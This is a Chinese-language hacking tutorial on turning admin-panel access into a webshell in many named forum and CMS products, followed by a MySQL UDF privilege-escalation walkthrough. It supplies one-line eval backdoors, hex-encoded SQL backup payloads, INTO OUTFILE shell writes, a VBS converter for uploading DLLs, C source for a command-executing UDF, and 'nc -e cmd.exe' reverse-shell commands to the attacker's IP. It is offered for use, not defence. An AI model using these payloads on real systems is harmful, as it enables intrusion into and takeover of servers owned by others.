如何从后台得到webshell

注意：如何进入后台，不是本文讨论范围，其具体方法就不说了，靠大家去自己发挥。此文参考了前人的多方面的资料和信息，在此一并表示感谢。

一、直接上传获得webshell

这种对php和jsp的一些程序比较常见，MolyX BOARD就是其中一例，直接在心情图标管理上传.php类型，虽然没有提示，其实已经成功了，上传的文件url应该是

，前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名，bo-blog后台可以可以直接上传.php文件，上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统)，因过滤上传文件不严，导致用户可以直接上传webshell到网站任意可写目录中，从而拿到网站的管理员控制权限。

二、添加修改上传类型

现在很多的脚本程序上传模块不是只允许上传合法文件类型，而大多数的系统是允许添加上传类型，bbsxp后台可以添加asa　asP类型，ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp，可以添加.aspasp的文件类型来上传获得webshell。php系统的后台，我们可以添加.php.g1f的上传类型，这是php的一个特性,最后的哪个只要不是已知的文件类型即可，php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是：在上传类型中增加asp ，注意，asp后面是有个空格的，然后在前台上传ASP马，当然也要在后面加个空格！

三、利用后台管理功能写入webshell

上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0，还有leadbbs2.88等，直接在后台修改配置文件，写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是：添加一个新的友情链接，在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符，http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。

四、利用后台管理向配置文件写webshell

利用"""":""//"等符号构造最小马写入程序的配置文件，joekoe论坛，某某同学录，沸腾展望新闻系统，COCOON Counter统计程序等等，还有很多php程序都可以，COCOON Counter统计程序举例，在管理邮箱处添上cnhacker@263.net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//"，还有一种方法就是写上 cnhacker@263.net"%＞＜%eval request(chr(35))%＞＜%'，这样就会形成前后对应，最小马也就运行了。＜%eval request(chr(35))%＞可以用lake2的eval发送端以及最新的2006 客户端来连，需要说明的是数据库插马时候要选前者。再如动易2005，到文章中心管理-顶部菜单设置-菜单其它特效，插入一句话马"%＞＜%execute request("l")%＞＜%'，保 存顶部栏目菜单参数设置成功后，我们就得到马地址http://网站/admin/rootclass_menu_config.asp。

五、利用后台数据库备份及恢复获得webshell

主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp，从而得到webshell，msssql版的程序就直接应用了access版的代码，导致sql版照样可以利用。还可以备份网站asp文件为其他后缀 如.txt文件，从而可以查看并获得网页源代码，并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候，但是有asp系统在运行，利用此方法来查看源代码来获得其数据库的位置，为数据库插马来创造机会，动网论坛就有一个ip地址的数据库，在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法，很多asp程序在即使改了后缀名后也会提示文件非法，通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的，还有一种就是用记事本打开图片文件，随便粘贴一部分复制到asp木马文件头，修改gif后缀后上传也可以突破检测，然后备份为.asp文件，成功得到webshell。

六、利用数据库压缩功能

可以将数据的防下载失效从而使插入数据库的最小马成功运行，比较典型的就是loveyuki的L-BLOG，在友情添加的url出写上＜%eval request (chr(35))%＞, 提交后，在数据库 *** 作中压缩数据库，可以成功压缩出.asp文件，用海洋的最小马的eval客户端连就得到一个webshell。

七、asp+mssql系统

这里需要提一点动网mssql版，但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片，然后记住其上传路径。写一个本地提交的表单，代码如下：

＜form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post"＞

＜p＞已上传文件的位置：＜input name="Dbpath" type="text" size="80"＞＜/p＞

＜p＞要复制到的位置：＜input name="backpath" type="text" size="80"＞＜/p＞

＜p＞＜input type="submit" value="提交"＞＜/p＞ ＜/form＞

另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里，想要备份的WebShell的相对路径填写在“要复制到的位置”那里，提交就得到我们可爱的WebShell了，恢复代码和此类似，修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台，动网的数据库还原和备份是个摆设，不能执行sql命令备份webshell，只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell，一般后台是显示了绝对路径，只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码，利用动网7.0的注入漏洞可以用差异备份一个webshell，可以用利用上面提到的方法，将conn.asp文件备份成.txt文件而获得库名。

差异备份的主要代码：

declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--

Drop table [heige]create table [dbo].[heige] ([cmd] [image])--

insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--

declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

这段代码中，0x626273是要备份的库名bbs的十六进制，可以是其他名字比如bbs.bak0x3C2565786563757465207265717565737428226C2229253E是＜%execute request("l")%＞的十六进制，是lp最小马；0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也就是你要备份的webshell路径。当然也可以用比较常见备份方式来获得webshell，唯一的不足就是备份后的文件过大，如果备份数据库中有防下载的的数据表，或者有错误的asp代码，备份出来的webshell就不会成功运行，利用差异备份是成功率比较高的方法，并且极大的减少备份文件的大小。

八、php+mysql系统

后台需要有mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFILE查询输出php文件，因为所有的数据是存放在mysql里的，所以我们可以通过正常手段把我们的webshell代码插入mysql在利用SELECT ... INTO OUTFILE语句导出shell。在mysql *** 作里输入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '路径’ 就可以获得了一个＜?eval($_POST[a])?＞的最小马' 0x3C3F6576616C28245F504F53545B615D293B3F3E 是我们＜?eval($_POST[a])?＞的十六进制，这种方法对phpmyadmin比较普遍，先利用phpmyadmin的路径泄露漏洞，比较典型的 是http://url/phpmyadmin/libraries/select_lang.lib.php。

就可以暴出路径，php环境中比较容易暴出绝对路径：）。提一点的是遇到是mysql在win系统下路径应该这样写d:\\wwwroot\\a.php。下面的方法是比较常用的一个导出webshell的方法，也可以写个vbs添加系统管理员的脚本导出到启动文件夹，系统重起后就会添加一个管理员帐号

CREATE TABLE a(cmd text NOT NULL)

INSERT INTO a(cmd) VALUES('＜?fputs(fopen("./a.php","w"),"＜?eval(\$_POST[a])?＞")?＞')

select cmd from a into outfile '路径/b.php'

DROP TABLE IF EXISTS a

访问b.php就会生成一个＜?eval($_POST[a])?＞的最小马。

如果遇到可以执行php命令就简单多了,典型的代表是BO-BLOG,在后台的php命令框输入以下代码：

＜?

$sa = fopen("./up/saiy.php","w")

fwrite($sa,"＜?eval(\$_POST[a])?"."＞")

fclose($sa)

?＞

就会在up目录下生成文件名为saiy.php内容为＜?eval($_POST[a])?＞的最小php木马， 最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码＜?fputs(fopen("./a.php","w"),"＜?eval(\$_POST[a])?＞")?＞ 将会在当前目录生成一个a.php的最小马。

九、phpwind论坛从后台到webshell的三种方式

方式1 模板法

进入后台， 风格模版设置 ，在随便一行写代码，记住，这代码必须顶着左边行写，代码前面不可以有任何字符。

 

EOT

eval($a)

print ＜＜＜EOT

而后得到一个shell为http://网站/bbs/index.php。

方始2 脏话过滤法

进入安全管理 ◇ 不良词语过滤。新增不良词语写 a’]=’aa’eval($_POST[’a’])//

替换为那里可以随意写，而后得到一个shell地址为http://网站/bbs/data/bbscache/wordsfb.php。

方式3 用户等级管理

新建立会员组，头衔你可以随便写，但是千万不要写单双引号特殊符号，升级图片号写a’eval($_POST[’a’])// ，升级点数依然可以随意写。而后得到一个shell地址为http://网站/bbs/data/bbscache/level.php。

以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。

十、也可以利用网站访问计数系统记录来获得webshell

最明显的就是某私服程序内的阿江计数程序，可以通过http://网站/stat.asp?style=textreferer= 代码内容&screenwidth=1024直接提交， 即可把代码内容直接插入到计数系统的数据库中，而此系统默认数据库为count#.asa，我们可以通过http://网站/count%23.asa访问得到webshell，由于阿江计数程序过滤了%和+，将最小马改成＜SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT＞eval(Request("1"))＜/SCRIPT＞替换代码内容处提交，然后用lake2的eval客户端来提交，值得一提的是如果进到计数后台，可以清理某时某刻的数据，一旦插入asp木马失败，可以清理数据库再次 *** 作。

很早网上就有了用mysql弱口令得到webshell教程，但是这次我要说的不是得到webshell，而是直接得到系统权限，看清楚了，是“直接”得到！

首先，我简单说一下mysql弱口令得到系统权限得过程：首先利用mysql脚本上传udf dll文件，然后利用注册UDF

DLL中自写的Function函数，而执行任意命令。

思路很简单，网上也有一些教程，但是他们要么没有给具体的代码，要么一句话代过，搞得象我似得小菜很难理解，终于在我付出了几天得不断测试得辛勤劳动后，有了点结果，我把详细过程和相关代码得交给大家，这样大家就可以自己写dll文件，自己生成不同文件得二进制码啦！

下面，我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码（网友Mix用的方法）：

set @a =

concat('',0x0123abc1312389…..)

set @a = concat(@a,0x4658978abc545e……)

………………….

create table Mix(data LONGBLOB)//建表Mix,字段为data，类型为longblob

insert into Mix values("")update Mix set data = @a//@a插入表Mix

select

data from Mix into DUMPFILE 'C:\\Winnt\\文件名'//导出表中内容为文件

前两句很熟悉把，这个就是我们以前注入的时候，绕过’的解决办法，把代码的16进制数声明给一个变量，然后导入这个变量就行了。只不过这里，因为16进制代码是一个文件的内容，代码太长了，所以就用了concat函数不断把上次得代码类加起来，这样不断累计到一个变量a中。后面几句就很简单了，我都有注释。

后面三句好说，但是前面的那么多16进制数据，手工的话，累人啊！不过你还记得以前有一个exe2bat.vbs脚本吗？这次我们可以把这个脚本修改一下后，得到我们这里需要得mysql脚本！对比exe2bat.vbs生成得文件和我们需要脚本的文件格式，我们可以轻松的得到我们所需的脚本。脚本内容如下：

fp=wscript.arguments(0

fn=right(fp,len(fp)-instrrev(fp,"\"))

with

createobject("adodb.stream")

.type=1:.open:.loadfromfile

fp:str=.read:sl=lenb(str)

end with

sll=sl mod 65536:slh=sl\65536

with

createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)

.write "set @a = concat('',0x"

for i=1 to sl

bt=ascb(midb(str,i,1))

if bt<16 then .write "0"

.write hex(bt)

if i mod 128=0 then

.write ")" vbcrlf "set @a = concat(@a,0x"

next

end with

好了，现在只要你把所要上传的文件拖到这个脚本图标上面，就可以生成一个同名的txt文件了。这个txt文件，就是我们所需要的mysql脚本，当然我们还需要修改一下这个txt文件（毕竟他是我们偷工减料得来的！），把最后一行生成的多余的那句“set

@a = concat('',0x”删除了，加上建表，插值得那三句代码即可！

脚本生成了，如何上传？先登陆mysql服务器：

C:\>mysql –u root –h hostip –p

Mysql>use mysql

//先进入mysql默认得数据库，否则你下一步的表将不知道属于哪个库

Mysql>\. E:\*.dll.txt

//这儿就是你生成的mysql脚本

按照上面输入命令，就可以看见屏幕文字飞快闪烁（当然网速要快啦），不一会你的文件旧上传完毕了！

下面到达我们的重点，我们上传什么dll文件？就目前我再网上看到的有两个已经写好的dll文件，一个是Mix写得mix.dll，一个是envymask写得my_udf.dll,这两个我都用过，都很不错，但是都也有点不足。先来看看具体的使用过程吧！

先用mix.dll:

登陆mysql,输入命令：

Mysql>\. e:\mix.dll.txt

Mysql>

CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll'

//这儿的注册的Mixconnect就是在我们dll文件中实现的函数，我们将要用他执行系统命令！

Mysql>select

Mixconnect('你的ip','8080')//填写你的反dip和端口

过一会儿，你监听8080端口的nc，就会得到一个系统权限的shell了！如图1：

这个的确不错，通过反d得到得shell可以传过一些防火墙，可惜的是，它的这个函数没有写得很好，只能执行一次，当你第二次连接数据库后，再次运行“select

Mixconnect('你的ip','8080')”的时候，对方的mysql会当掉！报错，然后服务停止！

所以，使用mix.dll你只有一次成功，没有再来一次的机会！另外根据我的测试，他对Win2003的系统好像不起作用。

再用my_udf.dll：

Mysql>\. C:\my_udf.dll.txt

Mysql>CREATE FUNCTION my_udfdoor

RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll'

//同样地，my_udfdoor也是我们注册后，用来执行系统命令得函数

Mysql>select my_udfdoor('’)

//这儿可以随便写my_udfdoor得参数，相当于我们只是要激活这个函数

好了，现在你可以不用关这个shell了，我们再开一个cmd，使用：

D:\>nc hostip 3306

*

4.0.*-nt x$Eo~MCG f**k //看到这个后，输入“f**k”

,他是my_udfdoor默认密码，自己无法更改

过一会儿，你就有了系统权限的shell了，

由于他是hook

recv版，所以穿墙的能力很强，我是在上一个mix.dll反d失败的情况下，才使用这个得，他果然不负所望！进系统后，发现它有双网卡，天网防火墙个人版V2.73，对外仅仅开放3306端口，由此可见，my_udf.dll确实有很强的穿透防火墙得能力！但是他也有一个bug,就是再我们连接激活这个函数后（就是使用了命令“select

my_udfdoor('’)”后），不管你是否连接，只要执行了:

Mysql>drop function my_udfdoor

后，mysql也汇报错，然后挂掉，

所以，你使用这个dll文件无法删除你的痕迹！

最后，然我们自己写一个自定义的dll文件。看能不能解决问题。

我们仅仅使用mysql 得udf的示例作模版即可！看他的示例：

#include <stdlib.h>

#include <winsock.h>

#include

<mysql.h>

extern "C" {

char *my_name(UDF_INIT *initid, UDF_ARGS

*args, char *is_null,

char *error)

// 兼容C

}

char

*my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

char *error)

{

char * me = "my name"

return me

// 调用此UDF将返回 my name

}

十分简单吧？好，我们只需要稍微改一下就可以有了自己的dll文件了：

下面是我的一个哥们Crackme是修改的：

#include

<stdlib.h>

#include <windows.h>

#include "mysql.h"

extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS

*args, char *is_null, char *error)// sys_name就是函数名，你可以任意修改

__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char

*is_null, char *error) //当然这儿的sys_name也得改！

{

char me[256] = {0}

if

(args->arg_count == 1){

strncpy(me,args->args[0],args->lengths[0])

me[args->lengths[0]]='\0'

WinExec(me,SW_HIDE)//就是用它来执行任意命令

}else

strcpy(me,"do nonthing.\n")

return me

}

好，我们编译成sysudf.dll文件就可以了！我们来用他实验一把！

看 *** 作：

Mysql>\.

C:\sysudf.dll.txt

Mysql>Create function sys_name returns string soname

'C:\\windows\\sysudf.dll'

Mysql>\. Nc.exe.txt //把nc.exe也上传上去

Mysql>select sys_name('nc.exe -e cmd.exe 我的ip 8080')

//sys_name参数只有一个，参数指定要执行的系统命令

好，看看在Win2003中的一个反dshell了，

当然，我们你也可以不反dshell了，而去执行其他命令，只不过不论是否执行成功，都没有回显，所以要保证命令格式正确。对于这个dll文件，经过测试，不论何时“drop

function

sys_name”，都是不会报错的，同时也可以多次运行不同命令。至于他的缺点，就是他的穿墙能力跟Mix.dll一样不算太强，但对于实在穿不透的墙，直接运行其他命令就是最好的选择了。

上面三个dll文件可谓各有所短，如何选择，就看你遇到的实际情况了。

好了，从脚本得编写使用到dll文件编写使用，说了这么多，现在大家应该都会了吧？题目说的是弱口令得到系统权限，但是如果你在注入等其他过程中，爆出了config.php中的mysql密码，不也是可以使用的吗？这样我们岂不是也找到继Serv-u后又一大提权方法了吗？

---